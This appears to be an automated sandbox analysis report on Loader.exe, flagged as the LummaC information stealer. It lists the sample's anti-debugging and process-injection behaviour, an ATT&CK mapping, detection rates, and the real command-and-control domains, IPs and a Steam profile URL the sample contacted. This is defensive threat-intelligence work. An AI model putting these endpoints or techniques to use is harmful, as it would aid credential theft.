Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Loader.exe

API call chain: ExitProcess graph end node

graph_3-19243

Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00443090 LdrInitializeThunk,

3_2_00443090

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_0019D1AF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0019D1AF

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00192198 mov edi, dword ptr fs:[00000030h]	0_2_00192198
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001AA937 mov eax, dword ptr fs:[00000030h]	0_2_001AA937
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001A0D89 mov ecx, dword ptr fs:[00000030h]	0_2_001A0D89
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001AA937 mov eax, dword ptr fs:[00000030h]	2_2_001AA937
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00192198 mov edi, dword ptr fs:[00000030h]	2_2_00192198
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001A0D89 mov ecx, dword ptr fs:[00000030h]	2_2_001A0D89

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_001ACF36 GetProcessHeap,

0_2_001ACF36

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_0019D1AF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0019D1AF
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001971E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001971E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00197508 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00197508
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00197695 SetUnhandledExceptionFilter,	0_2_00197695
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_0019D1AF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0019D1AF
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001971E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_001971E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00197508 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00197508
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00197695 SetUnhandledExceptionFilter,	2_2_00197695

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Loader.exe	String found in binary or memory: drawwyobstacw.sbs
Source: Loader.exe	String found in binary or memory: condifendteu.sbs
Source: Loader.exe	String found in binary or memory: ehticsprocw.sbs
Source: Loader.exe	String found in binary or memory: vennurviot.sbs
Source: Loader.exe	String found in binary or memory: resinedyw.sbs
Source: Loader.exe	String found in binary or memory: enlargkiw.sbs
Source: Loader.exe	String found in binary or memory: allocatinow.sbs
Source: Loader.exe	String found in binary or memory: mathcucom.sbs
Source: Loader.exe	String found in binary or memory: widdensmoywi.sbs

Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_001AC370
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_001AC612
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_001AC65D
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_001AC6F8
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_001AC783
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_001AC9D6
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_001ACAFF
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_001ACC05
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_001ACCD4
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_001A3366
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_001A3810
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	2_2_001A3810
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	2_2_001AC9D6
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_001ACAFF
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_001AC370
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	2_2_001A3366
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	2_2_001ACC05
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_001ACCD4
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	2_2_001AC612
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	2_2_001AC65D
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	2_2_001AC6F8
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_001AC783

Source: C:\Users\user\Desktop\Loader.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00197402 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00197402

Source: C:\Users\user\Desktop\Loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	41 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Loader.exe	42%	ReversingLabs	Win32.Trojan.CrypterX
Loader.exe	41%	Virustotal		Browse
Loader.exe	100%	Avira	HEUR/AGEN.1361748
Loader.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
condifendteu.sbs	0%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
vennurviot.sbs	17%	Virustotal	Browse
drawwyobstacw.sbs	0%	Virustotal	Browse
mathcucom.sbs	0%	Virustotal	Browse
enlargkiw.sbs	0%	Virustotal	Browse
allocatinow.sbs	0%	Virustotal	Browse
resinedyw.sbs	0%	Virustotal	Browse
ehticsprocw.sbs	0%	Virustotal	Browse
sergei-esenin.com	18%	Virustotal	Browse
widdensmoywi.sbs	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/badges	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
condifendteu.sbs	104.21.79.35	true	true	0%, Virustotal, Browse	unknown
steamcommunity.com	104.102.49.254	true	true	0%, Virustotal, Browse	unknown
vennurviot.sbs	172.67.140.193	true	true	17%, Virustotal, Browse	unknown
drawwyobstacw.sbs	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
mathcucom.sbs	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
widdensmoywi.sbs	104.21.8.37	true	true	0%, Virustotal, Browse	unknown
sergei-esenin.com	172.67.206.204	true	true	18%, Virustotal, Browse	unknown
ehticsprocw.sbs	172.67.173.224	true	true	0%, Virustotal, Browse	unknown
resinedyw.sbs	172.67.205.156	true	true	0%, Virustotal, Browse	unknown
enlargkiw.sbs	104.21.33.249	true	true	0%, Virustotal, Browse	unknown
allocatinow.sbs	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
enlargkiw.sbs	true		unknown
allocatinow.sbs	true		unknown
drawwyobstacw.sbs	true		unknown
https://widdensmoywi.sbs/api	true		unknown
mathcucom.sbs	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vennurviot.sbs/api	true		unknown
ehticsprocw.sbs	true		unknown
condifendteu.sbs	true		unknown
https://drawwyobstacw.sbs/api	true		unknown
widdensmoywi.sbs	true		unknown
https://resinedyw.sbs/api	true		unknown
https://mathcucom.sbs/api	true		unknown
resinedyw.sbs	true		unknown
vennurviot.sbs	true		unknown
https://condifendteu.sbs/api	true		unknown
https://enlargkiw.sbs/api	true		unknown
https://sergei-esenin.com/api	true		unknown
https://ehticsprocw.sbs/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/?subsection=broadcasts	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/	Loader.exe, 00000003.00000002.2304373806.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/subscriber_agreement/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs/v	Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs/1w#U	Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/piP	Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://enlargkiw.sbs/apibs-	Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/privacy_agreement/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/points/shop/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://enlargkiw.sbs/	Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/5xx-error-landing	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mathcucom.sbs/	Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic	Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://enlargkiw.sbs/api%U	Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://enlargkiw.sbs/1w#U	Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://help.steampowered.com/en/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/api	Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
